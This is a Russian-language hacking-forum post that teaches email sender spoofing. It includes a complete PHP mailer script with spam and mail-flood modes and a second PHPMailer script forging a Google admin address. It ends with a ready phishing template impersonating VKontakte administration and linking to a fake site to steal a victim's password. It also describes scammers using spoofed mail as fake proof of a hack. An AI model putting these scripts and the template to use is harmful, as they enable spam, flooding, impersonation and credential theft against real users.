"Подделываем" почту и приминяем на практике

"Подделываем" почту и приминяем на практике

03.01.2009, 23:48

geforse

Постоянный

Регистрация: 02.03.2008

Сообщений: 893

С нами: 9574565

Репутация: 712

"Подделываем" почту и приминяем на практике

Моя первая статья ... строго не судите

Intro

Я хочу рассказать вам о замене исходящего адреса в e-mail и его практическом применении

Вы можете отправить письмо своему другу от billi@microsoft.com и сказать, что взломали сервер майкрософта.

Но есть и более "вкусные" применения ...

Code

В гугле всегда можно отыскать то, что нам нужно, в данном случае это готовый скрипт (автора NOmeR1) отправки писем с подменой адреса отправителя

PHP код:


		
			
<?

/*

(C) NOmeR1

*/

?>

<title>Sender Anonym Email :: FLoodeR :: SpameR</title>

<?

//

error_reporting (0);

if(!set_time_limit(0)) {

$limit = false;

} else {

set_time_limit(0);

ignore_user_abort(1);

$limit = true;

}

$log = 'log.txt'; // Файл лога



ini_set('max_execution_time', '0');



?>

set_time_limit(0) = <?if($limit)echo('<font color=Green>On</font>');else

echo('<font color=Red>Off</font> (Время работы ограничено текущими настройками сервера)');?><br>

<?

$ip = getenv('REMOTE_ADDR');

if($_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3')

{



$_POST['to'] = stripslashes($_POST['to']);

$_POST['msg'] = stripslashes($_POST['msg']);

$_POST['from'] = stripslashes($_POST['from']);

$_POST['subject'] = stripslashes($_POST['subject']);



if($_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe'])

{

$headers = "MIME-Version: 1.0\r\n";

$headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251\r\n";

$headers .= "From: ".$_POST['from']."\n";

if($_GET['mail'] == '1')

{

mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Не возможно отправить сообщение');

}

elseif($_GET['mail'] == '2')

{

$_POST['to'] = explode("\n",$_POST['to']);

foreach($_POST['to'] as $poluchatels)

{

mail($poluchatels, $_POST['subject'], $_POST['msg'], $headers) or die('Не возможно отправить сообщение');

}

}

elseif($_GET['mail'] == '3')

{

if(preg_match('/[0-9]+/',$_POST['kol']))

{

for($i=0;$i<$_POST['kol'];$i++)

{

mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Не возможно отправить сообщение');

sleep(1);

}

}

else

{

echo('Неверно введено (или не введено) кол-во сообщений');

}

}

$f = fopen($log,'a');

fwrite($f,'Отправелено сообщение &'.$_POST['msg'].'& с темой "'.$_POST['subject'].'" для "'.$_POST['to'].'" с IP - "'.$ip."\"\r\n");

fclose($f);

echo('<center><b><font color="green">Сообщение успешно отправлено</font></b></center>');

}

else

{

?>

<form style="width:350px" method='post'>

<?

if($_GET['mail'] == '1' || $_GET['mail'] == '3')

{

echo("Получатель &nbsp;<input type='text'name='to'><br>");

}

?>

Отправитель <input type='text' name='from'><br>

Тема сообщ. &nbsp;<input type='text' name='subject'><br>

<?

if($_GET['mail'] == '3')

{

echo("Кол-во сообщений <input type='text' name='kol'><br>");

}

?>

<br>

htm -&gt; <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> :: <input type='radio' name='tipe' value='plain'>&lt;- text<br>

<?

if($_GET['mail'] == '2')

{

echo("Получатели<br><textarea name='to' rows='10' cols='30'>admin@admin.ru

admin@mail.ru

tiger@ya.ru</textarea>");

}

?>

<br>Сообщение<br>

<textarea name='msg' rows='10' cols='30'></textarea><br><br><input type='submit'>

</form>

<?

}

} else {

?><br>

<a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Отправить простое сообщение</a><br>

<a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Наспамить</a><br>

<a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Налудить</a><br>

<?

}

?>

Ну тут всё просто:

Загружаем скрипт на сервер с поддержкой .php
Заполняем поля: Отправитель,Получатель,Тем а,Сообщение
и всё

----------------------------------------------------------------------

Ну конечно лёгким путём мы не пойдём и напишем свой скрипт (файл class.phpmailer.php можно скачать тут или тут)

PHP код:


		
			
<?php 

require('class.phpmailer.php');    

$messag='Привет!'; 

$to = 'Admin@antichat.ru';  

$subject = 'Как дела ?';  // Тема письма

$from_name='Админ_гугла'; // От кого (Имя) 

$from_email='admin@google.ru'; // От кого (e-mail)

$mail = new PHPMailer();   

$mail->From = $from_email;      

$mail->FromName = $from_name ;  

$mail->AddAddress($to, $to_adres); 

$mail->IsHTML(true);        // Вид письма (HTML)   

$mail->Subject = $subject;   

$mail->Body = $messag;  

if ($mail->Send()) 

{                    

    $res = 'Отослали';  

} 

else  

{  

   $res = 'Ошибка'; 

   echo 'Mailer Error: '.$mail->ErrorInfo;  

} 

 echo $res; 

?>

Сохраняем и загружаем на сервер

Приминение

Кидалы иногда используют данный метод при продаже почты либо после якобы взлома (тоесть вы заказываете взлом e-mail и в качестве доказательства вам присылают письмо с как будто бы взломленной почты)

Но подмена адреса может понадобится и простому "СИ инженеру"

Есть такой замечательный (хотя может и нет) сервис Vkontakte.ru
Допустим мы хотим узнать пароль челвека. Для начала нужно узнать его E-mail (Настоящему СИ инженеру пара пустяков

) дальше с помощью нашего скрипта отправляем письмо на почту жертве (от ВКонтакте.ру <admin@vkontakte.ru> )

Код:

/*Полное имя жертвы*/,

Павел Дуров оставил комментарий к Вашей фотографии.

http://www.фейк.ru/photos.php=act&id=12374904_113674884

С уважением,
Администрация ВКонтакте.ру


_____
Вы можете поменять настройки e-mail оповещений на странице:
http://vkontakte.ru/settings.php?act=notify

И если "жертва" клюнула, пароль у вас

Естественно можно тоже самое делать с другими сайтами

Желаю всем удачи и С Новым Годом = )

𝕏 Twitter Reddit Telegram Копировать ссылку